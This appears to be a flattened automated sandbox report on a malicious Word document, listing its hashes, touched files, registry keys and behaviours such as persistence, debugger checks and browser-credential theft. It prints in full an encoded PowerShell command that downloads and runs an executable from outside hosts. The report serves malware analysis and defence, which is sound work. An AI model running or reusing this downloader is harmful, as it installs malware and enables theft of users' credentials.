c:\users\atveydl98z\appdata\local\microsoft\windows\history\history.ie5\mshist012017083120170901\index.dat dat File users\atveydl98z\appdata\local\microsoft\windows\history\low\history.ie5\index.dat users\atveydl98z\appdata\local\microsoft\windows\history\low\history.ie5\index.dat c:\ c:\users\atveydl98z\appdata\local\microsoft\windows\history\low\history.ie5\index.dat dat File users\atveydl98z\appdata\local\microsoft\windows\history\low\history.ie5\mshist012017070520170706\index.dat users\atveydl98z\appdata\local\microsoft\windows\history\low\history.ie5\mshist012017070520170706\index.dat c:\ c:\users\atveydl98z\appdata\local\microsoft\windows\history\low\history.ie5\mshist012017070520170706\index.dat dat File users\atveydl98z\appdata\roaming\mozilla\firefox\profiles\zcf30c9i.default\places.sqlite users\atveydl98z\appdata\roaming\mozilla\firefox\profiles\zcf30c9i.default\places.sqlite c:\ c:\users\atveydl98z\appdata\roaming\mozilla\firefox\profiles\zcf30c9i.default\places.sqlite sqlite File users\atveydl98z\appdata\local\google\chrome\user data\default\web data users\atveydl98z\appdata\local\google\chrome\user data\default\web data c:\ c:\users\atveydl98z\appdata\local\google\chrome\user data\default\web data File users\atveydl98z\appdata\local\google\chrome\user data\default\login data users\atveydl98z\appdata\local\google\chrome\user data\default\login data c:\ c:\users\atveydl98z\appdata\local\google\chrome\user data\default\login data File programdata\9f1c.tmp programdata\9f1c.tmp c:\ c:\programdata\9f1c.tmp tmp WinRegistryKey Software\Microsoft\Internet Explorer\IntelliForms\Storage2 HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Mozilla HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Mozilla\Mozilla Firefox\bin HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin HKEY_LOCAL_MACHINE PathToExe WinRegistryKey SOFTWARE\Mozilla HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin HKEY_LOCAL_MACHINE PathToExe WinRegistryKey SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin HKEY_LOCAL_MACHINE PathToExe WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe HKEY_LOCAL_MACHINE File STD_INPUT_HANDLE File STD_OUTPUT_HANDLE File STD_ERROR_HANDLE WinRegistryKey Software\Clients\Mail\Microsoft Outlook HKEY_LOCAL_MACHINE DLLPathEx MSIApplicationLCID Analyzed Sample #17571 Malware Artifacts 17571 Sample-ID: #17571 Job-ID: #2329 First_Name This sample was analyzed by VMRay Analyzer 2.2.0 on a Windows 7 system 0 VTI Score based on VTI Database Version 2.6 Metadata of Sample File #17571 Submission-ID: #17597 C:\Users\ATVeyDl98Z\Desktop\49343.doc doc MD5 890ce730a3cf43f43039f114744df924 SHA1 19142bb0a5cdb0a7ad3520d1693ef5f3761d6d9a SHA256 d9c9e1fece032140a4754096b08a4eb147598a36f8b582c796b8764ff6cd9a91 Opened_By Metadata of Analysis for Job-ID #2329 Timeout False x86 32-bit PAE win7_32_sp1-mso2016 True Windows 7 6.1.7601.17514 (684da42a-30cc-450f-81c5-35b4d18944b1) 156.516 This is a property collection for additional information of VMRay analysis VMRay Analyzer Device VTI rule match with VTI rule score 4/5 vmray_hook_keyboard_by_keystate_api Read the current state of the "VK_CANCEL" by API. Monitor keyboard input Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "powershell -e JAB7AHcAYABzAGAAYwBSAEkAcAB0AH0AIAA9ACAAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAG8AYgBqAGUAYwB0ACcALAAnAGUAdwAtACcALAAnAG4AJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADQAfQB7ADIAfQB7ADEAfQB7ADMAfQB7ADAAfQAiACAALQBmACAAJwBsAGwAJwAsACcAUwAnACwAJwAuACcALAAnAGgAZQAnACwAJwBXAFMAYwByAGkAcAB0ACcAKQA7ACQAewBXAGUAQgBjAGwAYABpAGAARQBOAHQAfQAgAD0AIAAuACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADMAfQAiACAALQBmACAAJwBuAGUAdwAtACcALAAnAG8AJwAsACcAYgAnACwAJwBqAGUAYwB0ACcAKQAgACgAIgB7ADQAfQB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiACAALQBmACAAJwBsAGkAZQAnACwAJwB0AGUAbQAuAE4AZQB0ACcALAAnAG4AdAAnACwAJwAuAFcAZQBiAEMAJwAsACcAUwB5AHMAJwApADsAJAB7AHIAYQBgAE4ARABPAE0AfQAgAD0AIAAmACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACcAYwB0ACcALAAnAGIAagBlACcALAAnAGUAdwAtAG8AJwAsACcAbgAnACkAIAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAHIAYQBuAGQAbwAnACwAJwBtACcAKQA7ACQAewB1AGAAUgBsAFMAfQAgAD0AIAAoACIAewAxADcAfQB7ADIAMQB9AHsAMQAxAH0AewAxADUAfQB7ADEAfQB7ADMAfQB7ADMAOAB9AHsAMwA5AH0AewAzADcAfQB7ADIAMgB9AHsAMQAwAH0AewA2AH0AewAzADEAfQB7ADAAfQB7ADMANAB9AHsAMQA2AH0AewAyADYAfQB7ADMAMAB9AHsAMgAwAH0AewAxADQAfQB7ADkAfQB7ADMANgB9AHsAMgAzAH0AewA4AH0AewAyADQAfQB7ADIANQB9AHsAMgA5AH0AewAyADgAfQB7ADEAMgB9AHsANQB9AHsAMgB9AHsAMQA5AH0AewAyADcAfQB7ADcAfQB7ADEAMwB9AHsANAB9AHsAMQA4AH0AewAzADMAfQB7ADMANQB9AHsAMwAyAH0AIgAgAC0AZgAgACcAZQBhAHQAcwBwAGEAJwAsACcAaQBuAGUAJwAsACcAcwAuAGMAJwAsACcAYQBsAC4AYwBvAG0AJwAsACcAZwAnACwAJwBsAHUAJwAsACcAaAAnACwAJwByAGUAcwBzAC8AJwAsACcAZQBzAC4AbgBlACcALAAnAC8ALABoAHQAdABwACcALAAnACwAJwAsACcALwBrAGUAJwAsACcALwBiAG0AYQBzAHQAZQByAHAAJwAsACcARAAnACwAJwB5AHIAcgAnACwAJwByACcALAAnAC4AdQBrAC8AVgBRAC8ALABoAHQAdABwADoALwAvAHUAbQBlACcALAAnAGgAdAB0ACcALAAnAE4AJwAsACcAbwBtAC8AJwAsACcAbwBtAC8AJwAsACcAcAA6AC8AJwAsACcALwBoAFEAbwBCAG0ALwAnACwAJwAvAC8AbgB5AGUAcgBnACcALAAnAHQALwAnACwAJwBxAHEAcgAvACwAJwAsACcAeAAnACwAJwB3AG8AcgBkAHAAJwAsACcAcAA6AC8AJwAsACcAaAB0AHQAJwAsACcAeAAuAGMAJwAsACcAdAB0AHAAOgAvAC8AJwAsACcASgBGAGgALwAnACwAJwBuAGsAJwAsACcAbQAuAGMAbwAnACwAJwBHACcALAAnADoAJwAsACcAdAAnACwAJwAvAHMAJwAsACcAaQBtAHAAbAB5AGUAbABlAGcAYQBuACcAKQAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAbABpAHQAJwAsACcAUwBwACcAKQAuAEkAbgB2AG8AawBlACgAJwAsACcAKQA7ACQAewBuAGAAQQBtAEUAfQAgAD0AIAAkAHsAcgBhAG4ARABgAE8ATQB9AC4AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAHQAJwAsACcAbgBlAHgAJwApAC4ASQBuAHYAbwBrAGUAKAAxACwAIAA2ADUANQAzADYAKQA7ACQAewBQAGAAQQBUAEgAfQAgAD0AIAAkAHsARQBgAE4AdgA6AGAAVABFAE0AUAB9ACAAKwAgACcAXAAnACAAKwAgACQAewBOAGAAQQBtAEUAfQAgACsAIAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBlAHgAZQAnACwAJwAuACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAHsAdQBgAFIAbAB9ACAAaQBuACAAJAB7AFUAUgBgAGwAUwB9ACkAewB0AHIAeQB7ACQAewB3AEUAYgBgAGMATABJAGUAYABOAHQAfQAuACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAG4AbAAnACwAJwBEAG8AdwAnACwAJwBvAGEAZABGAGkAbABlACcAKQAuAEkAbgB2AG8AawBlACgAJAB7AHUAYABSAEwAfQAuACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbgBnACcALAAnAGkAJwAsACcAVABvAFMAdAByACcAKQAuAEkAbgB2AG8AawBlACgAKQAsACAAJAB7AFAAYABBAHQAaAB9ACkAOwAmACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACAAJwBTACcALAAnAHQAYQByAHQALQAnACwAJwBQAHIAbwBjAGUAcwBzACcAKQAgACQAewBQAEEAYABUAEgAfQA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsALgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAJwBpAHQAZQAtAGgAbwBzAHQAJwAsACcAcgAnACwAJwB3ACcAKQAgACQAewBfAH0ALgAiAEUAeABDAGAAZQBgAFAAVABpAE8ATgAiAC4AIgBtAGUAcwBzAGAAQQBgAGcAZQAiADsAfQB9AA0ACgA=". Create process Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "Global\.net clr networking". Create system object Network VTI rule match with VTI rule score 3/5 vmray_request_dns_by_name Resolve host name "kerineal.com". Perform DNS request Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe". Create process Anti Analysis VTI rule match with VTI rule score 4/5 vmray_detect_debugger_by_api Check via API "IsDebuggerPresent". Try to detect debugger Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "MF6003E70". Create system object Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "Global\I40F77A1B". Create system object Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "Global\M40F77A1B". Create system object Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe". Create process Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "M68B1B0D0". Create system object Persistence VTI rule match with VTI rule score 3/5 vmray_install_startup_script_by_registry Add ""C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe"" to windows startup via registry. Install system startup script or application Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process ""C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1B.tmp"". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process ""C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" /scomma "C:\ProgramData\9F1C.tmp"". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process ""C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe" "C:\ProgramData\9F2D.tmp"". Create process Browser VTI rule match with VTI rule score 3/5 vmray_read_browser_history Read the browsing history for "Microsoft Internet Explorer". Read data related to browsing history Browser VTI rule match with VTI rule score 3/5 vmray_read_browser_credentials Read saved credentials for "Google Chrome". Read data related to saved browser credentials Information Stealing VTI rule match with VTI rule score 4/5 vmray_readout_browser_credentials Possibly trying to readout browser credentials. Read browser data